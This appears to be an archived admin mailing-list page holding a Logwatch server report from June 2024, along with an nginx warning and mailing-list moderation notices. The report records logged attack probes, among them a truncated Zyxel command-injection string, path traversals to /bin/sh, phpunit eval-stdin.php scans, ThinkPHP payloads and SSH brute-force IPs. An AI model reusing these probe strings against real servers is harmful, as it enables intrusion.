Logwatch for h2361197.stratoserver.net (Linux)
by root@zapf.in
################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Sat Jun 1 04:42:03 2024
Date Range Processed: yesterday
( 2024-May-31 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [ 13:13 ]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
Connection attempts using mod_proxy:
87.121.69.52 -> google.com:443: 1 Time(s)
A total of 2 sites probed the server
170.64.189.193
185.94.29.119
Requests with error response codes
400 Bad Request
null: 3 Time(s)
*: 2 Time(s)
/bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${I ... }zyxel.selfrep;: 1 Time(s)
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%3 ... 5%%32%65/bin/sh: 1 Time(s)
/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2 ... %2e/.%2e/bin/sh: 1 Time(s)
google.com:443: 1 Time(s)
mstshash=Administr: 1 Time(s)
500 Internal Server Error
/: 6 Time(s)
/.env: 1 Time(s)
/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s)
/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s)
/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s)
/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s)
/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s)
/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s)
/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s)
/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s)
/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s)
/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s)
/index.php?lang=../../../../../../../../tmp/index1: 1 Time(s)
/index.php?lang=../../../../../../../../us ... /tmp/index1.php: 1 Time(s)
/index.php?s=/index/\x5Cthink\x5Capp/invok ... vars[1][]=Hello: 1 Time(s)
/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s)
/lib/phpunit/Util/PHP/eval-stdin.php: 1 Time(s)
/lib/phpunit/phpunit/Util/PHP/eval-stdin.php: 1 Time(s)
/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s)
/lib/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s)
/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s)
/owa/auth/x.js: 1 Time(s)
/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s)
/phpunit/Util/PHP/eval-stdin.php: 1 Time(s)
/phpunit/phpunit/Util/PHP/eval-stdin.php: 1 Time(s)
/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s)
/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s)
/public/index.php?s=/index/\x5Cthink\x5Cap ... vars[1][]=Hello: 1 Time(s)
/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s)
/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s)
/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s)
/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s)
/vendor/phpunit/Util/PHP/eval-stdin.php: 1 Time(s)
/vendor/phpunit/phpunit/LICENSE/eval-stdin.php: 1 Time(s)
/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php: 1 Time(s)
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s)
/vendor/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s)
/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s)
/workspace/drupal/vendor/phpunit/phpunit/s ... /eval-stdin.php: 1 Time(s)
/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s)
/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s)
/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s)
/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s)
/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s)
502 Bad Gateway
/e9MRve_5Ss-WIGygIFrjDw/pdf: 1 Time(s)
/eYfmXWgBQ0yVAUU-_38aXw/pdf: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
unknown (134.122.124.61): 50 Time(s)
root (134.122.124.61): 23 Time(s)
root (123.56.72.54): 14 Time(s)
unknown (161.35.174.47): 13 Time(s)
root (183.81.169.238): 12 Time(s)
root (79.110.62.145): 10 Time(s)
unknown (79.110.62.145): 10 Time(s)
unknown (85.209.11.27): 6 Time(s)
unknown (194.169.175.35): 5 Time(s)
unknown (210.207.186.120): 5 Time(s)
unknown (85.209.11.254): 5 Time(s)
unknown (112.163.14.14): 4 Time(s)
unknown (194.169.175.36): 4 Time(s)
root (85.209.11.27): 2 Time(s)
nobody (175.213.176.148): 1 Time(s)
root (161.35.174.47): 1 Time(s)
root (178.150.135.19): 1 Time(s)
root (194.169.175.36): 1 Time(s)
root (220.178.39.106): 1 Time(s)
root (36.110.172.196): 1 Time(s)
root (41.207.248.204): 1 Time(s)
root (85.209.11.254): 1 Time(s)
sshd (194.169.175.36): 1 Time(s)
sshd (85.209.11.27): 1 Time(s)
unknown (106.51.71.157): 1 Time(s)
unknown (118.182.32.16): 1 Time(s)
unknown (121.202.195.103): 1 Time(s)
unknown (121.202.204.251): 1 Time(s)
unknown (124.29.220.227): 1 Time(s)
unknown (175.200.58.141): 1 Time(s)
unknown (193.252.152.214): 1 Time(s)
unknown (31.146.161.214): 1 Time(s)
unknown (59.12.21.15): 1 Time(s)
unknown (c188-149-58-162.bredband.tele2.se): 1 Time(s)
unknown (p1544052-ipxg00c01sizuokaden.shizuoka.ocn.ne.jp): 1 Time(s)
Invalid Users:
Unknown Account: 119 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
3 Connections
2 Connections lost (inbound)
3 Disconnections
---------------------- Postfix End -------------------------
--------------------- Connections (secure-log) Begin ------------------------
**Unmatched Entries**
systemd-logind: New seat seat0.: 1 Time(s)
---------------------- Connections (secure-log) End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
SSHD Started: 2 Time(s)
Disconnecting after too many authentication failures for user:
invalid : 1 Time(s)
Failed logins from:
36.110.172.196: 1 time
41.207.248.204: 1 time
79.110.62.145: 10 times
85.209.11.27: 3 times
85.209.11.254: 1 time
123.56.72.54: 14 times
134.122.124.61: 23 times
161.35.174.47: 1 time
175.213.176.148: 1 time
178.150.135.19 (19.135.150.178.triolan.net): 1 time
183.81.169.238: 12 times
194.169.175.36: 2 times
220.178.39.106: 1 time
Illegal users from:
2001:470:1:c84::12 (scan-02o.shadowserver.org): 1 time
undef: 49 times
31.146.161.214: 1 time
43.134.92.151: 1 time
59.12.21.15: 5 times
65.49.1.118 (scan-59k.shadowserver.org): 1 time
79.110.62.145: 10 times
82.157.59.178: 1 time
85.209.11.27: 6 times
85.209.11.254: 5 times
106.51.71.157 (106.51.71.157.actcorp.in): 1 time
112.163.14.14: 4 times
118.182.32.16: 1 time
121.202.195.103 (m121-202-195-103.smartone.com): 1 time
121.202.204.251 (m121-202-204-251.smartone.com): 1 time
122.26.220.52 (p1544052-ipxg00c01sizuokaden.shizuoka.ocn.ne.jp): 1 time
123.56.72.54: 16 times
124.29.220.227: 1 time
134.122.124.61: 50 times
161.35.174.47: 13 times
175.200.58.141: 5 times
188.149.58.162 (c188-149-58-162.bredband.tele2.se): 1 time
193.252.152.214: 1 time
194.169.175.35: 5 times
194.169.175.36: 4 times
210.207.186.120: 6 times
**Unmatched Entries**
error: buffer_get_string_ret: incomplete message [preauth] : 1 time(s)
Disconnecting: Protocol error: expected packet type 21, got 20 [preauth] : 1 time(s)
userauth_pubkey: unsupported public key algorithm: rsa-sha2-256 [preauth] : 2 time(s)
fatal: buffer_get_string: buffer error [preauth] : 1 time(s)
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/ploop22185p1 394G 243G 132G 65% /
none 4.0G 0 4.0G 0% /dev
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################
1 Jahr, 4 Monate
Cron <root@h2361197> /usr/sbin/nginx -s reload
by root@zapf.in
nginx: [warn] conflicting server name "xn--studienfhrer-physik-dbc.de" on 0.0.0.0:80, ignored
nginx: [warn] conflicting server name "topf.zapf.in" on 0.0.0.0:80, ignored
1 Jahr, 4 Monate
studienreformforum@zapf.in post from groetzebauch@dpg-mail.de requires approval
by studienreformforum-owner@zapf.in
As list administrator, your authorization is requested for the
following mailing list posting:
List: studienreformforum(a)zapf.in
From: groetzebauch(a)dpg-mail.de
Subject: [PhyDid B]
The message is being held because:
The message is not from a list member
At your convenience, visit your dashboard to approve or deny the
request.
1 Jahr, 4 Monate
studienreformforum@zapf.in post from groetzebauch@dpg-mail.de requires approval
by studienreformforum-owner@zapf.in
As list administrator, your authorization is requested for the
following mailing list posting:
List: studienreformforum(a)zapf.in
From: groetzebauch(a)dpg-mail.de
Subject: [PhyDid B] ORCID Zugriff erbeten
The message is being held because:
The message is not from a list member
At your convenience, visit your dashboard to approve or deny the
request.
1 Jahr, 4 Monate
studienreformforum@zapf.in post from groetzebauch@dpg-mail.de requires approval
by studienreformforum-owner@zapf.in
As list administrator, your authorization is requested for the
following mailing list posting:
List: studienreformforum(a)zapf.in
From: groetzebauch(a)dpg-mail.de
Subject: [PhyDid B]
The message is being held because:
The message is not from a list member
At your convenience, visit your dashboard to approve or deny the
request.
1 Jahr, 4 Monate
studienreformforum@zapf.in post from groetzebauch@dpg-mail.de requires approval
by studienreformforum-owner@zapf.in
As list administrator, your authorization is requested for the
following mailing list posting:
List: studienreformforum(a)zapf.in
From: groetzebauch(a)dpg-mail.de
Subject: [PhyDid B] ORCID Zugriff erbeten
The message is being held because:
The message is not from a list member
At your convenience, visit your dashboard to approve or deny the
request.
1 Jahr, 4 Monate